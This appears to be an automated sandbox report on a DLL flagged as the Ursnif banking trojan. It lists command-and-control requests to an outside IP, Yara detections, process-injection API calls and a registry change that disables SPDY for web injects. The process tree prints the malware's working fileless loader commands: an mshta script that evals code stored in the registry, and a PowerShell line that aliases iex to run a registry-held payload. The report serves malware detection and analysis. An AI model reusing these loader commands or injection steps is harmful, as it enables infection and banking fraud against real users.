                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: rundll32.exe, 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: rundll32.exe, 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: explorer.exe, 00000021.00000000.523469701.00000000026D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.572314670.00000000026D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.526704286.00000000026D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.562762119.00000000026D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobY
                      Source: powershell.exe, 00000014.00000002.767708483.000002DC67F3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000014.00000002.767419442.000002DC67D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000014.00000002.767708483.000002DC67F3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000014.00000002.767708483.000002DC67F3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE4CC6 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,3_2_04DE4CC6
                      Source: global trafficHTTP traffic detected: GET /phpadmin/amEwUCMy/zQvTSnELMCHIJfWA9A7NF2J/B_2FgTN3w5/bDUz7M_2FQ_2FvsyQ/_2FoZnlV0ztm/G4pVInXE2v2/3DjsF_2BN_2F7_/2FqxWA7q0ZWwUgJ9q_2B6/oG7o48SwKb_2FuN4/koQCfS1rrGeWSn9/gvwn1WY7oRq54G3QzL/QoP8Nx_2F/m8EC_2FPKp_2B2QIRT4a/hKoi_2FT5FiIh7mNlS7/jciRuxpI3KdaM19hmR8F9V/NOK7C_2BauAdB/emv_2BixRfY4926/zZ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/1p0semBcWFOiJ/VuHxHtu5/AN830nRWQ1d2xctaoA3KLHR/918Z9VEhPV/P8ohXldFwnNmepL6Q/uKTfc4fmSrkK/BfYNKcK_2Bx/w_2FA1ltM5KCgm/3UT06OWaufeDOP8Oq_2FL/oIF6meLVrySmPHH0/RIFJ_2FHuhWguIS/4hvBrDpXZ_2FB9M_2F/VjlCK_2FC/TflkNLJtzRIEzaze5_2F/wDsLbDghNL5li48V5rm/4qe0lRbO5_2FdP6RKk3aIg/j40b09twfw_2F/PdHkwNcC/i0_2BVuZ/L.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/sJOLDU_2FhOUoo/k46SW66GV6I1pQKjWA9TE/PWpby4hvIkOnAKsS/x0Aee5T7Xyol_2F/mHBJFq72pa7ZryIdq5/j7jpLfh_2/B9C_2B8rr1N7pwYs7Hbz/HAjnG5DvkxUUwsnvZ2H/7mKa3lBAhH1k0Vg5CBUe72/SPp1Kc_2FZv6K/7UGQxmIh/q1dxSy205p9HqV1EWhDaIi0/wpq760vWJe/2wvTRaTBNSXKAlgWL/PHcpI3wJ6a_2/BROCpFJpoTX/N2ZuQyATVgKAeO/_2Fd3SdF.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391081269.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.439315042.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.436001223.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.438329210.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391236122.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390852806.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390783473.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390963737.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391015018.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390663420.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391212771.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7148, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6932, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.4de0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5456940.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53aa4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53aa4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4c794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4c794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54294a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54294a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.438131198.00000000053AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.517494573.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.515954749.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.516723035.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.438206007.0000000005429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.566002484.0000000004C79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.568306199.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.569427566.000000000512F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391081269.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.439315042.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.436001223.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.438329210.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391236122.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390852806.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390783473.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390963737.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391015018.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390663420.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391212771.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7148, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6932, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.4de0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5456940.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53aa4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53aa4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4c794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4c794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54294a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54294a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.438131198.00000000053AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.517494573.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.515954749.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.516723035.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.438206007.0000000005429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.566002484.0000000004C79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.568306199.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.569427566.000000000512F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE3072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_04DE3072

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: Process Memory Space: powershell.exe PID: 6932, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: HxEWwh74qT.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Process Memory Space: powershell.exe PID: 6932, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 608
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE821C3_2_04DE821C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE198A3_2_04DE198A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE475F3_2_04DE475F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00808C3020_2_000002DC00808C30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00803B6420_2_000002DC00803B64
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F8D2020_2_000002DC007F8D20
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081681420_2_000002DC00816814
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080F83C20_2_000002DC0080F83C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081A84C20_2_000002DC0081A84C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081B7AC20_2_000002DC0081B7AC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F47E420_2_000002DC007F47E4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080B91020_2_000002DC0080B910
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081613820_2_000002DC00816138
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F711C20_2_000002DC007F711C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081324820_2_000002DC00813248
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007FC96C20_2_000002DC007FC96C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081099C20_2_000002DC0081099C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081C1CC20_2_000002DC0081C1CC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007FD2EC20_2_000002DC007FD2EC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081833C20_2_000002DC0081833C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F133820_2_000002DC007F1338
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F433820_2_000002DC007F4338
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007FA2F820_2_000002DC007FA2F8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F1AF420_2_000002DC007F1AF4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00816C4020_2_000002DC00816C40
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080845420_2_000002DC00808454
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F4C5420_2_000002DC007F4C54
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080D36C20_2_000002DC0080D36C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081AB8420_2_000002DC0081AB84
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007FDBAC20_2_000002DC007FDBAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC008043BC20_2_000002DC008043BC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00815BD420_2_000002DC00815BD4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00818BD820_2_000002DC00818BD8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080FCEC20_2_000002DC0080FCEC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080050020_2_000002DC00800500
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00807D5020_2_000002DC00807D50
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007FE46420_2_000002DC007FE464
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080DC8C20_2_000002DC0080DC8C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081CCC420_2_000002DC0081CCC4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080ADF020_2_000002DC0080ADF0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081765020_2_000002DC00817650
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080E57820_2_000002DC0080E578
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081970820_2_000002DC00819708
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080BF1420_2_000002DC0080BF14
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080167820_2_000002DC00801678
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F1F3420_2_000002DC007F1F34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE3A9C NtMapViewOfSection,3_2_04DE3A9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE4695 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_04DE4695
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE25D7 GetProcAddress,NtCreateSection,memset,3_2_04DE25D7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE8441 NtQueryVirtualMemory,3_2_04DE8441
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC008010B4 NtMapViewOfSection,20_2_000002DC008010B4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F59D4 NtCreateSection,20_2_000002DC007F59D4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F79AC NtSetInformationProcess,CreateRemoteThread,ResumeThread,20_2_000002DC007F79AC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F2B58 NtWriteVirtualMemory,20_2_000002DC007F2B58
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00817D48 NtQueryInformationProcess,20_2_000002DC00817D48
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F8D20 NtSetContextThread,NtUnmapViewOfSection,20_2_000002DC007F8D20
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00817DB4 NtQueryInformationToken,NtQueryInformationToken,20_2_000002DC00817DB4
                      Source: HxEWwh74qT.dllBinary or memory string: OriginalFilenamerpcapd.exe0 vs HxEWwh74qT.dll
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: HxEWwh74qT.dllVirustotal: Detection: 36%
                      Source: HxEWwh74qT.dllReversingLabs: Detection: 30%
                      Source: HxEWwh74qT.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 608
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 604
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 612
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
